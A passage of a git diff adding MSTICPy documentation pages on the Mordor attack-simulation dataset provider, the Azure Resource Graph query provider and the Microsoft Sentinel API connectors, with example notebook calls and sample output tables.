+`MordorData <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/MordorData.ipynb>`__
+
+
+Using the Data Provider to download datasets
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Using the data provider you can download and render event data as a
+pandas DataFrame.
+
+.. note:: Mordor includes both host event data and network capture
+   data. Although Capture files can be downloaded and unpacked, MSTICPy
+   currently cannot display them in a pandas DataFrame. Most *network*
+   datasets use capture (.cap) files. You can view these using
+   tools such as tcpdump, tshark or GUI tools such as WireShark, Brim
+   and others.
+
+   Host event data stored in JSON files is retrieved and populated into DataFrames.
+
+
+To use the Mordor provider, first create a Mordor query provider. Then
+call the connect() function: this will download metadata from Mordor and
+Mitre to populate the query set.
+
+Download progress is shown with a progress bar (not shown below).
+
+.. code:: ipython3
+
+    >>> from msticpy.data import QueryProvider
+    >>> mdr_data = QueryProvider("Mordor")
+    >>> mdr_data.connect()
+
+
+.. parsed-literal::
+
+    Retrieving Mitre data...
+    Retrieving Mordor data...
+
+
+List Queries
+------------
+
+Once the metadata is downloaded, the provider is populated with query functions
+that you can use to retrieve the datasets.
+
+.. note:: Many Mordor data entries have multiple data sets, so we see
+   more queries than Mordor entries.
+
+You can see a list of available queries with the
+:py:func:`list_queries<msticpy.data.data_providers.QueryProvider.list_queries>`
+function. (Only first 15 are shown below)
+
+.. code:: ipython3
+
+    >>> mdr_data.list_queries()[:15]
+
+
+
+.. parsed-literal::
+
+    ['small.aws.collection.ec2_proxy_s3_exfiltration',
+     'small.windows.collection.host.msf_record_mic',
+     'small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges',
+     'small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges',
+     'small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc',
+     'small.windows.credential_access.host.empire_mimikatz_extract_keys',
+     'small.windows.credential_access.host.empire_mimikatz_logonpasswords',
+     'small.windows.credential_access.host.empire_mimikatz_lsadump_patch',
+     'small.windows.credential_access.host.empire_mimikatz_sam_access',
+     'small.windows.credential_access.host.empire_over_pth_patch_lsass',
+     'small.windows.credential_access.host.empire_powerdump_sam_access',
+     'small.windows.credential_access.host.empire_shell_reg_dump_sam',
+     'small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly',
+     'small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt',
+     'small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump']
+
+
+
+Retrieving/querying a data set
+------------------------------
+
+To retrieve a data set, run the required query. The queries are all available
+as attributes of the Mordor provider.
+
+.. note:: The queries support tab-completion, so as you type each
+   segment you can use the tab key to see a list of available options.
+
+.. code:: ipython3
+
+    >>> mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges().head(3)
+
+
+.. parsed-literal::
+
+    https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip
+    Extracting covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges_2020-08-05020926.json
+
+
+==========  ====================  ==========  =========  ===============  =========================  ===========  ========================================================================
+  @version              Keywords    ThreadID    Version  DestAddress      host                         LayerRTID  Message
+==========  ====================  ==========  =========  ===============  =========================  ===========  ========================================================================
+         1  -9214364837600034816        4888          1  239.255.255.250  wec.internal.cloudapp.net           44  The Windows Filtering Platform has permitted a connection.
+         1  -9223372036854775808        4452          2  nan              wec.internal.cloudapp.net          nan  File created:                                                eventlog
+         1  -9223372036854775808        4452          2  nan              wec.internal.cloudapp.net          nan  RawAccessRead detected:                                      eventlog
+==========  ====================  ==========  =========  ===============  =========================  ===========  ========================================================================
+
+
+.. note:: the table shown above has been truncated for illustration.
+
+
+
+Optional parameters
+-------------------
+
+The data provider and the query functions support some parameters to control
+aspects of the query operation.
+
+-  **use_cached** : bool, optional Try to use locally saved file first,
+   by default True. If you’ve previously downloaded a file, it will use
+   this rather than downloading a new copy.
+-  **save_folder** : str, optional Path to output folder, by default
+   ".". The path that downloaded and extracted files are saved to.
+-  **silent** : bool If True, suppress feedback. By default, False.
+
+If you specify these when you initialize the data provider, the settings
+will apply to all queries.
+
+.. code:: ipython3
+
+    >>> mdr_data = QueryProvider("Mordor", save_folder="./mordor")
+    >>> mdr_data.connect()
+
+.. note:: since the first line is creating a new instance of the Mordor
+   provider, you will need to call "connect" again. The Mordor and Mitre
+   metadata will be cached so you will not have to download this again
+   in this session.
+
+Using these parameters in the query will override the provider settings
+and defaults for that query.
+
+.. code:: ipython3
+
+    >>> mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(
+          save_folder="./investigation002"
+        )
+
+Getting summary data about a query
+----------------------------------
+
+Call the query function with a single "?" parameter to display
+summary information.
+
+.. code:: ipython3
+
+    >>> mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges("?")
+
+.. parsed-literal::
+
+    Query:  covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges
+    Data source:  Mordor
+    Covenant DCSync
+
+    Notes
+    -----
+    Mordor ID: SDWIN-200805020926
+    This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.
+
+    Mitre Techniques: T1003: OS Credential Dumping
+    Mitre Tactics: TA0006: Credential Access
+
+    Parameters
+    ----------
+    Query:
+    https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip
+
+
+Searching for Queries with QueryProvider.search_queries()
+---------------------------------------------------------
+
+You can use the provider
+:py:func:`search_queries<msticpy.data.drivers.mordor_driver.MordorDriver.search_queries>`
+function to search for queries for matching required attributes.
+
+This function takes a single string parameter - ``search``.
+
+Unless you include delimiters (see next), the search parameter treated as a literal
+text string to search for. It tries to match this string against any text in the
+metadata of the Mordor data sets. The search is case-sensitive.
+
+Search also supports some simple search term logic and AND and OR expressions:
+
+-  Substrings separated by commas will be treated as OR terms,
+   e.g. "a, b" == "a" OR "b".
+-  Substrings separated by “+” will be treated as AND terms,
+   e.g. "a + b" == "a" AND "b"
+
+.. note:: You cannot combine "+" and "," in the same search.
+   For this reason, grouping of expressions is not supported.
+
+The search returns a Python list of the names and descriptions of
+any matching queries.
+
+Examples:
+~~~~~~~~~
+
+Simple text string
+
+.. code:: ipython3
+
+    >>> mdr_data.search_queries("AWS")
+
+
+.. parsed-literal::
+
+    ['small.aws.collection.ec2_proxy_s3_exfiltration (AWS Cloud Bank Breach S3)']
+
+Search for items that have both "Empire" and "T1222".
+
+.. code:: ipython3
+
+    >>> mdr_data.search_queries("Empire + T1222")
+
+
+
+.. parsed-literal::
+
+    ['small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)',
+     'small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)']
+
+Search for items that have both "Empire" and "Credential".
+
+.. code:: ipython3
+
+    >>> mdr_data.search_queries("Empire + Credential")
+
+
+
+.. parsed-literal::
+
+    ['small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',
+     'small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',
+     'small.windows.defense_evasion.host.empire_wdigest_downgrade.tar (Empire WDigest Downgrade)',
+     'small.windows.credential_access.host.empire_mimikatz_sam_access (Empire Mimikatz SAM Extract Hashes)',
+     'small.windows.credential_access.host.empire_mimikatz_lsadump_patch (Empire Mimikatz Lsadump LSA Patch)',
+     'small.windows.credential_access.host.empire_mimikatz_logonpasswords (Empire Mimikatz LogonPasswords)']
+
+
+
+Mordor Browser
+^^^^^^^^^^^^^^
+
+We’ve built a specialized browser for Mordor data. This uses
+the metadata in the repository to let you search for and view full
+details of the dataset.
+
+You can also download and preview (if it is convertible to a DataFrame)
+the dataset from the browser
+
+See
+:py:class:`MordorBrowser<msticpy.data.browsers.mordor_browser.MordorBrowser>`.
+for API details.
+
+For more explanation of the data items shown in the browser, please see
+the `Mordor GitHub repo <https://github.com/OTRF/mordor>`__ and the
+`Threat Hunter Playbook <https://threathunterplaybook.com/introduction.html>`__
+
+.. code:: ipython3
+
+    >>> from msticpy.data.browsers.mordor_browser import MordorBrowser
+    >>> mdr_browser = MordorBrowser()
+
+
+.. figure:: _static/MordorBrowser.png
+   :alt: Mordor data browser showing selectable list and data fields.
+   :width: 5in
+
+
+
+The top scrollable list is a list of the Mordor datasets. Selecting one
+of these updates the data in the lower half of the browser.
+
+Filter Drop-down
+----------------
+
+To narrow your search you can filter using a text search or filter by
+Mitre ATT&CK Techniques or Tactics. Click on the arrow to open the
+filter pane.
+
+The Filter text box
+~~~~~~~~~~~~~~~~~~~
+This uses the same syntax as the provider ``search_queries()`` function.
+
+-  Simple text string will find matches for datasets that contain this string
+-  Strings separated by “,” are treated as OR terms
+   i.e. it will match items that contain ANY of the substrings
+
+-  Strings separated by “+” are treated as AND terms
+   i.e. it will match items that contain ALL of the substrings
+
+Filtering by Mitre Categories
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+-  The Mitre ATT&CK Techniques and Tactics lists are multi-select lists. Only
+   items that have techniques and tactics matching the selected items will
+   be show. By default, all are selected.
+
+Clearing the Filter
+~~~~~~~~~~~~~~~~~~~
+-  Reset Filter button will clear any filtering.
+
+.. figure:: _static/MordorBrowser-filter.png
+   :alt: Filtering the list of data sets shown with text expressions.
+   :width: 5in
+
+Main Details Window
+-------------------
+
+-  title, ID, author, creation date, modification date and description
+   are self-explanatory.
+-  tags can be used for searching (although the search functions
+   in the browser and data provider will search over all text).
+-  file_paths (see `File paths`_ below)
+-  attacks - lists related Mitre Technique and Tactics. The item title
+   is a link to the Mitre page describing the technique or tactic.
+-  notebooks - if there are one or more notebooks in the Threat Hunter Playbook
+   site that relate to this dataset, descriptions and links to the notebooks
+   are shown here.
+-  simulation - raw data listing the steps in the attack (and useful for
+   replaying the attack in a demo environment).
+-  references - links to any external documents about the attack.
+
+
+File paths
+----------
+
+This section allows you to select, download and (in most cases) display
+the event data relating to the attack.
+
+Select a file and click on the Download button.
+
+The zipped file is downloaded and extracted. If it is event data, this
+is converted to a pandas DataFrame and displayed below the rest of the
+data.
+
+The current dataset is available as an attribute of the browser:
+
+::
+
+       mdr_browser.current_dataset
+
+Datasets that you’ve downloaded and displayed in this session are also
+cached in the browser and available in the ``mdr_browser.datasets``
+attribute.
+
+Downloaded files
+----------------
+
+By default files are downloaded and extracted to the current folder. You
+can change this with the ``save_folder`` parameter when creating the
+``MordorBrowser`` object.
+
+You can also specify the ``use_cached`` parameter. By default, this is
+``True``, which causes downloaded files not to be deleted after
+extraction. These local copies are used if you try to view the same data
+set again. This also works across sessions.
+
+If ``use_cache`` is set to False, files are deleted immediately after
+downloading, extracting and populating the DataFrame.
+
+
+Using the standard query browser
+--------------------------------
+
+You can also use the standard QueryProvider query browser to view some
+details of the queries. This works for all query types (not just Mordor)
+but has fewer details.
+See
+:py:mod:`query_browser<msticpy.data.browsers.query_browser>`
+for more details.
+
+.. code:: ipython3
+
+    >>> mdr_data.browse_queries()
+
+.. figure:: _static/MordorBrowser-std-query-browser.png
+   :alt: Using the standard query browser to view Mordor queries.
+   :width: 5in
+
diff --git a/docs/source/data_acquisition/ResourceGraphDriver.rst b/docs/source/data_acquisition/ResourceGraphDriver.rst
new file mode 100644
index 000000000..0cb8d3bab
--- /dev/null
+++ b/docs/source/data_acquisition/ResourceGraphDriver.rst
@@ -0,0 +1,237 @@
+Azure Resource Graph Provider
+=============================
+
+This data provider allows for a connection to the `Azure Resource
+Graph <https://docs.microsoft.com/azure/governance/resource-graph/overview>`__
+and a way to query against the `Azure Resource Graph
+Explorer <https://docs.microsoft.com/azure/governance/resource-graph/first-query-portal>`__.
+The data connector functions in the same way as other data connectors
+and uses the Kusto Query Language (KQL) and has with some subtle
+differences to other connectors in they way that authentication is
+handled.
+
+You would use this data connector to flexibly and quickly get details on
+deployed Azure resources within a subscription. It allows for bulk
+queries on various aspects of resources and returns data in a very
+structured format. This makes it much more effective and efficient than
+getting resource specific details via the resource API.
+
+More details about data providers in MSTICPy can be found in
+:doc:`the documentation <DataProviders>`.
+
+Azure Resource Graph Configuration
+----------------------------------
+
+The provider uses the Azure configuration specified in
+the Azure section of the *msticpyconfig.yaml*.
+
+These settings affect all Azure components.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+An example.
+
+.. code:: yaml
+
+    Azure:
+      auth_methods:
+      - cli
+      - interactive
+      cloud: global
+
+See :ref:`getting_started/SettingsEditor:Azure Cloud and Authentication Settings`
+
+
+Loading a Query Provider for Azure Resource Graph
+-------------------------------------------------
+
+The provider for the Azure Resource Graph is named ``ResourceGraph``
+
+.. code:: ipython3
+
+    from msticpy.data.data_providers import QueryProvider
+    qry_prov = QueryProvider("ResourceGraph")
+
+Connecting to Azure Resource Graph
+----------------------------------
+
+Once initialized the first step in using the data provider is to
+authenticate. The Resource Graph provider uses MSTICPy's :ref:`Azure
+authentication
+features <data_acquisition/AzureData:Instantiating and Connecting with an Azure Data Connector>`
+and you can provide a set of authentication methods when connecting. By
+default the provider will attempt to authenticate using credentials
+stored in msticpyconfig.yaml (or as environment variables) and an Azure
+CLI connection but this can be customized with the 'auth_methods'
+keyword.
+
+Once successfully connected you will be presented with a “Connected”
+message.
+
+.. code:: ipython3
+
+    qry_prov.connect(auth_methods=["cli"])
+
+
+.. parsed-literal::
+
+    Connected
+
+
+Listing available queries
+-------------------------
+
+As with other data providers there are a number of built-in queries with
+this provider. Once connected you can view the available queries with
+``QUERY_PROVIDER.list_queries()``.
+
+Alternatively you can view query details in an interactive widget with
+``QUERY_PROVIDER.browse_queries()``
+
+For more information, see: :ref:`data_acquisition/DataProviders:Listing Available Queries`.
+
+.. code:: ipython3
+
+    qry_prov.list_queries()
+
+
+
+
+.. parsed-literal::
+
+    ['ResourceGraph.list_detailed_virtual_machines',
+     'ResourceGraph.list_public_ips',
+     'ResourceGraph.list_resources',
+     'ResourceGraph.list_resources_by_api_version',
+     'ResourceGraph.list_resources_by_type',
+     'ResourceGraph.list_virtual_machines']
+
+
+
+Running pre-defined query
+-------------------------
+
+In order to run pre-defined query, execute with the query name,
+e.g. ``QUERY_PROVIDER.ResourceGraph.QUERY_NAME()``. You can pass
+parameters to these queries to customize them, however they will also
+run with default parameters if none as provider. The query browser will
+provide details as to what parameters are available with each query.
+
+As with other data providers data is returned to you in a Pandas
+DataFrame.
+
+For more information , refer documentation - :ref:`Running a pre-defined
+query <data_acquisition/DataProviders:Running a pre-defined query>`
+
+.. code:: ipython3
+
+    qry_prov.ResourceGraph.list_resources_by_api_version()
+
+
+==================================================  ==================
+type                                                apiVersion
+==================================================  ==================
+microsoft.alertsmanagement/actionrules              2019-05-05-preview
+microsoft.alertsmanagement/smartdetectoralertrules  2021-04-01
+microsoft.apimanagement/service                     2019-12-01
+microsoft.automanage/accounts                       2020-06-30-preview
+microsoft.automation/automationaccounts             2018-06-30
+==================================================  ==================
+
+
+Running an ad-hoc query
+~~~~~~~~~~~~~~~~~~~~~~~
+
+You can also define a your own KQL query for the Resource Graph and run
+with ``QUERY_PROVIDER.exec_query(QUERY)``
+
+
+.. code:: ipython3
+
+    query = "Resources | where type =~ 'Microsoft.Compute/virtualMachines' | take 3"
+    qry_prov.exec_query(query)
+
+
+===========================================================================================================================================  =============  =================================  ====================================  ======  ==========  ===============  ====================================  ===========  =====  ======  =======
+id                                                                                                                                           name           type                               tenantId                              kind    location    resourceGroup    subscriptionId                        managedBy    sku    plan    zones
+===========================================================================================================================================  =============  =================================  ====================================  ======  ==========  ===============  ====================================  ===========  =====  ======  =======
+/subscriptions/1d228542-43d3-43fa-b9f6-e2a5e3d69d47/resourceGroups/LinuxTestLab/providers/Microsoft.Compute/virtualMachines/RHEL77Base       RHEL77Base     microsoft.compute/virtualmachines  1d228542-43d3-43fa-b9f6-e2a5e3d69d47          eastus2     linuxtestlab     1d228542-43d3-43fa-b9f6-e2a5e3d69d47
+/subscriptions/1d228542-43d3-43fa-b9f6-e2a5e3d69d47/resourceGroups/LinuxTestLab/providers/Microsoft.Compute/virtualMachines/Ubuntu18ASC      Ubuntu18ASC    microsoft.compute/virtualmachines  1d228542-43d3-43fa-b9f6-e2a5e3d69d47          eastus2     linuxtestlab     1d228542-43d3-43fa-b9f6-e2a5e3d69d47
+/subscriptions/1d228542-43d3-43fa-b9f6-e2a5e3d69d47/resourceGroups/monster-island/providers/Microsoft.Compute/virtualMachines/GodzillaTron1  GodzillaTron1  microsoft.compute/virtualmachines  1d228542-43d3-43fa-b9f6-e2a5e3d69d47          japanwest   monster-island   1d228542-43d3-43fa-b9f6-e2a5e3d69d47
+===========================================================================================================================================  =============  =================================  ====================================  ======  ==========  ===============  ====================================  ===========  =====  ======  =======
+
+
+.. container:: alert alert-block alert-info
+
+   Note: Resource Graph queries are limited to 1000 rows of output each.
+   If your query returns 1000 rows it is likely it has hit this limit,
+   consider re-writing the query to return a smaller subset of data.
+   This applies to both built in queries and ad-hoc queries.
+
+End-to-end Example
+------------------
+
+In this example we want to take a look at all of the virtual machines we
+have in our environment and they get specific details including public
+IP on one of them:
+
+.. code:: ipython3
+
+    from msticpy.data.data_providers import QueryProvider
+    # Initialize and connect to provider
+    qry_prov = QueryProvider("ResourceGraph")
+    qry_prov.connect()
+
+
+.. parsed-literal::
+
+    Connected
+
+
+.. code:: ipython3
+
+    # Get list of VMs and see how many we have
+    vms = qry_prov.ResourceGraph.list_virtual_machines()
+    print(f"Number of VMs found : {len(vms.index)}")
+    # Filter the query to get a smaller dataset
+    vms = qry_prov.ResourceGraph.list_virtual_machines(add_query_items="| where resourceGroup contains 'msticpy'")
+    display(vms)
+    # Set hostname for our next query
+    hostname = vms.iloc[0]['name']
+
+    Number of VMs found : 421
+
+=================================================================================================================================  ==========  =================================  ====================================  ======  ==========  ===============  ====================================  ===========  =====  ======  =======
+id                                                                                                                                 name        type                               tenantId                              kind    location    resourceGroup    subscriptionId                        managedBy    sku    plan    zones
+=================================================================================================================================  ==========  =================================  ====================================  ======  ==========  ===============  ====================================  ===========  =====  ======  =======
+/subscriptions/1d228542-43d3-43fa-b9f6-e2a5e3d69d47/resourceGroups/MSTICpy/providers/Microsoft.Compute/virtualMachines/MSTIC-DSVM  MSTIC-DSVM  microsoft.compute/virtualmachines  1d228542-43d3-43fa-b9f6-e2a5e3d69d47          eastus      msticpy          1d228542-43d3-43fa-b9f6-e2a5e3d69d47                              ['1']
+=================================================================================================================================  ==========  =================================  ====================================  ======  ==========  ===============  ====================================  ===========  =====  ======  =======
+
+
+Now we can get details on the specific VM using its hostname.
+
+.. code:: ipython3
+
+    qry_prov.ResourceGraph.list_detailed_virtual_machines(host_name=hostname)
+
+
+=================================================================================================================================  ==========  ============  ======================================================================================================================================  ======================================================================================================================================  =================
+vmId                                                                                                                               vmName      vmSize        nicId                                                                                                                                   publicIpId                                                                                                                              publicIpAddress
+=================================================================================================================================  ==========  ============  ======================================================================================================================================  ======================================================================================================================================  =================
+/subscriptions/1d228542-43d3-43fa-b9f6-e2a5e3d69d47/resourceGroups/MSTICpy/providers/Microsoft.Compute/virtualMachines/MSTIC-DSVM  MSTIC-DSVM  Standard_B2s  /subscriptions/1d228542-43d3-43fa-b9f6-e2a5e3d69d47/resourceGroups/MSTICpy/providers/Microsoft.Network/networkInterfaces/mstic-dsvm832  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/MSTICpy/providers/Microsoft.Network/publicIPAddresses/MSTIC-DSVM-ip  11.11.11.111
+=================================================================================================================================  ==========  ============  ======================================================================================================================================  ======================================================================================================================================  =================
+
+
+Other Azure Resource Graph Documentation
+----------------------------------------
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Azure Resource Graph`.
+
+:py:mod:`Azure Resource Graph driver API documentation<msticpy.data.drivers.resource_graph_driver>`
+
+-  Azure Resource Graph:
+   https://docs.microsoft.com/azure/governance/resource-graph/overview
+-  Resource Graph Query Language:
+   https://docs.microsoft.com/azure/governance/resource-graph/concepts/query-language
diff --git a/docs/source/data_acquisition/Sentinel.rst b/docs/source/data_acquisition/Sentinel.rst
new file mode 100644
index 000000000..a22ef5e3e
--- /dev/null
+++ b/docs/source/data_acquisition/Sentinel.rst
@@ -0,0 +1,117 @@
+Microsoft Sentinel APIs
+=======================
+
+.. toctree::
+   :maxdepth: 2
+
+   SentinelAnalytics
+   SentinelBookmarks
+   SentinelIncidents
+   SentinelWatchlists
+
+Description
+-----------
+
+This package contains functionality making calls to Microsoft Sentinel directly.
+These can be used to get data from Microsoft Sentinel, as well as perform
+configuration and other actions on the Microsoft Sentinel Workspace
+
+:py:mod:`Microsoft Sentinel API documentation<msticpy.data.azure.sentinel_core.MicrosoftSentinel>`
+
+
+Instantiating and Connecting the Microsoft Sentinel API Connector
+-----------------------------------------------------------------
+
+See :py:class:`Microsoft Sentinel <msticpy.data.azure.sentinel_core.MicrosoftSentinel>`
+
+When instantiating the class you need to pass it details of the Sentinel workspace
+you want to interact with. This can be provided as a complete resource ID,
+e.g.
+
+.. code:: ipython3
+
+    MicrosoftSentinel(res_id="subscriptions/fdee8146-8bcf-460f-86f3-3f788c285efd/resourceGroups/myRG/providers/Microsoft.OperationalInsights/workspaces/myWorkspace")
+
+Alternatively you can provide the Subscription ID, Resource Group name and Workspace name
+seperately and let the class build the resource ID for you.
+Alternatively you can provide the Subscription ID, Resource Group name and Workspace name.
+e.g.
+
+.. code:: ipython3
+
+    MicrosoftSentinel(sub_id="fdee8146-8bcf-460f-86f3-3f788c285efd"
+        res_grp="myRG",
+        ws_name="myWorkspace")
+
+If no workspace details are provided it will attempt to use default workspace details from
+your config file.
+
+You can also specify a specific Azure Cloud if your workspace isn't in Azure's public cloud.
+
+In order to connect to the Microsoft Sentinel API and retrieve the required data
+we need to instantiate the MicrosoftSentinel class and authenticate to Azure.
+Authentication to the Microsoft Sentinel API is handled via an the azure_auth package.
+
+By default `['env', 'cli', 'msi', 'interactive']` is used but you can provide an alternative
+list to `.connect` via the auth_methods parameter.
+
+.. code:: ipython3
+
+        azs = MicrosoftSentinel()
+        azs.connect(auth_methods=['cli','interactive'])
+
+
+Get Microsoft Sentinel Workspaces
+---------------------------------
+
+See :py:meth:`list_sentinel_workspaces <msticpy.data.azure.sentinel_core.MicrosoftSentinel.get_sentinel_workspaces>`
+
+If you want to see Sentinel workspace in a subscription you can call `list_sentinel_workspaces`.
+
+``list_sentinel_workspaces`` returns a list of Microsoft Sentinel workspaces within
+a specified subscription.
+
+.. note:: this will only return workspaces that the authenticated account
+   is permitted to view.
+
+.. code:: ipython3
+
+    azs.get_sentinel_workspaces(sub_id="3b701f84-d04b-4479-89b1-fa8827eb537e")
+
+Incidents
+---------
+
+It is possible to get details of, update, and create Incidents via the MicrosoftSentinel connector.
+Details on working with Incidents can be found in :doc:`Sentinel Incidents <SentinelIncidents>`
+
+Hunting Queries
+---------------
+
+You can return a dataframe detailing all hunting queries configured in the workspace. This allows for
+analysis and configuration of hunting queries, as well as the ability to take a
+hunting query and run it with a QueryProvider.
+
+See :py:meth:`list_hunting_queries <msticpy.data.azure.sentinel_core.MicrosoftSentinel.list_hunting_queries>`
+
+.. code:: ipython3
+
+    azs.list_hunting_queries()
+
+Analytics
+---------
+
+You can interact with Analytics and Analytic templates, including creating new analytics via this feature.
+More details can be found in :doc:`Sentinel Analytics <SentinelAnalytics>`
+
+
+Bookmarks
+---------
+
+You can interact with Bookmarks, including creating new bookmarks and deleting existing bookmarks via this feature.
+More details can be found in :doc:`Sentinel Bookmarks <SentinelBookmarks>`
+
+Watchlists
+----------
+
+You can interact with Watchlists, including creating new watchlists and adding items to a watchlist via this feature.
+More details can be found in :doc:`Sentinel Watchlists <SentinelWatchlists>`
diff --git a/docs/source/data_acquisition/SentinelAnalytics.rst b/docs/source/data_acquisition/SentinelAnalytics.rst
new file mode 100644
index 000000000..a563b38c5
--- /dev/null
+++ b/docs/source/data_acquisition/SentinelAnalytics.rst
@@ -0,0 +1,67 @@
+Microsoft Sentinel Analytics
+============================
+
+List Analytics
+--------------
+
+To return a dataframe detailing all configured alert/analytics rules configured with Microsoft Sentinel
+call `list_alert_rules`. The returned dataframe includes scheduled queries, as well as Fusion based detections.
+The returned dataframe include details of the rule configuration as well as the query run (where applicable).
+
+See :py:meth:`list_alert_rules <msticpy.data.azure.sentinel_core.MicrosoftSentinel.list_alert_rules>`
+
+.. code:: ipython3
+
+    azs.list_alert_rules()
+
+You can also return details of avaliable Analytic templates with `list_analytic_templates`.
+
+See :py:meth:`list_analytic_templates <msticpy.data.azure.sentinel_core.MicrosoftSentinel.list_analytic_templates>`
+
+.. code:: ipython3
+
+    azs.list_analytic_templates()
+
+Create Analytics
+----------------
+
+To create a new analytic rule you can use `create_analytic_rule`. With this function you can create
+a new analytic rule either from an analytic template or with a set of custom details.
+
+See :py:meth:`create_analytic_rule <msticpy.data.azure.sentinel_core.MicrosoftSentinel.create_analytic_rule>`
+
+When creating an analytic if a template name or ID is provided details from that template will be used.
+
+.. code:: ipython3
+
+    azs.create_analytic_rule(template="f817f062-320c-4c18-891c-7c5cc64da6ee")
+
+Otherwise you can specify details manually. Request elements include:
+-name: The name to give the analytic.
+-query: The KQL query string to use in the anlaytic.
+-query_frequency: How often the query should run in ISO8601 format, by default "PT5H" (or 5 hours)
+-query_period: How far back the query should look in ISO8601 format, by default "PT5H" (or 5 hours)
+-severity: The severity to raise incidents as, by default "Medium" but options include "Informational", "Low", "Medium", "High"
+-suppression_duration: How long to suppress duplicate alerts in ISO8601 format, by default "PT1H" (or 1 hour)
+-suppression_enabled: Whether you want to suppress duplicates, by default False
+-trigger_operator: The operator for the trigger, by default "GreaterThan". Options include "Equal", "NotEqual", "LessThan", "GreaterThan"
+-trigger_threshold: The threshold of events required to create the incident, by default 0
+-description: A description of the analytic, by default None
+-tactics: A list of MITRE ATT&CK tactics related to the analytic, by default None
+-enabled: Whether you want the analytic to be enabled once deployed, by default True
+
+.. code:: ipython3
+
+    azs.create_analytic_rule(name="Custom Analytic", query="SecurityAlert | take 10")
+
+Delete Analytics
+----------------
+
+You can also delete analytic rules by passing the name or ID of the analytic rules to `delete_analytic_rule`.
+
+See :py:meth:`delete_analytic_rule <msticpy.data.azure.sentinel_core.MicrosoftSentinel.delete_analytic_rule>`
+
+.. code:: ipython3
+
+    azs.delete_analytic_rule(analytic_rule="a91d4cfa-1854-431b-a432-8742f9aa0d59")
+
diff --git a/docs/source/data_acquisition/SentinelBookmarks.rst b/docs/source/data_acquisition/SentinelBookmarks.rst
new file mode 100644
index 000000000..9dfe9a890
--- /dev/null
+++ b/docs/source/data_acquisition/SentinelBookmarks.rst
@@ -0,0 +1,44 @@
+Microsoft Sentinel Bookmarks
+============================
+
+List Bookmarks
+--------------
+
+`list_bookmarks` returns a list of all the bookmarks saved in the workspace. This includes details of the bookmark, who
+created it, when and with what details. It also includes query text that can be executed with a
+`QueryProvider` in order to get the details of the bookmark's logs.
+
+See :py:meth:`list_bookmarks <msticpy.data.azure.sentinel_core.MicrosoftSentinel.list_bookmarks>`
+
+.. code:: ipython3
+
+    azs.list_bookmarks()
+
+Create Bookmarks
+----------------
+
+You can create a bookmark with `create_bookmark`. When creating a bookmark the following details
+are needed:
+-name: The name of the bookmark to use.
+-query: The KQL query that generated the bookmark.
+-results: The results of the query to include with the bookmark, in a string format, by default None
+-notes: Any notes you want associated with the bookmark, by default None
+-labels: Any labels you want associated with the bookmark, by default None
+
+See :py:meth:`create_bookmark <msticpy.data.azure.sentinel_core.MicrosoftSentinel.create_bookmark>`
+
+.. code:: ipython3
+
+    azs.create_bookmark(name="Custom Bookmark", query="SecurityAlert | take 10", notes="Found by Pete")
+
+Delete Bookmarks
+----------------
+
+Bookmarks can be deleted by calling `delete_bookmark` and passing in a bookmark name, or a GUID of a bookmark.
+If the bookmark cannot be found then an error will be raised.
+
+See :py:meth:`delete_bookmark <msticpy.data.azure.sentinel_core.MicrosoftSentinel.delete_bookmark>`
+
+.. code:: ipython3
+
+    azs.delete_bookmark(bookmark="8c9f6b38-53dc-458a-b436-350845224e3a")
\ No newline at end of file
diff --git a/docs/source/data_acquisition/SentinelIncidents.rst b/docs/source/data_acquisition/SentinelIncidents.rst
new file mode 100644
index 000000000..9c2946921
--- /dev/null
+++ b/docs/source/data_acquisition/SentinelIncidents.rst
@@ -0,0 +1,101 @@
+Microsoft Sentinel Incidents
+============================
+
+List Incidents
+--------------
+
+It is possible to return a list of all incidents within a workspace, as well as get the details of a specific incident.
+Whilst it is possible to access these incident details via the Incident table in the Workspace, you can also interact
+with them via the Microsoft Sentinel APIs which are utilized in these functions.
+
+See :py:meth:`get_incidents <msticpy.data.azure_sentinel.MicrosoftSentinel.list_incidents>`
+
+.. code:: ipython3
+
+    azs.list_incidents()
+
+This returns a DataFrame with details of all incidents.
+
+To get details of a single incident you can call `.get_incident` and pass the ID of an incident.
+This ID can be found in the name column of the DataFrame returned by `.get_incidents` and appears in the form of a GUID.
+You can also provide an incident name and it will attempt to get an ID from this. If there are no matches, or multiple
+matches an error will be raised.
+
+See :py:meth:`get_incident <msticpy.data.azure.sentinel_core.MicrosoftSentinel.get_incident>`
+
+.. code:: ipython3
+
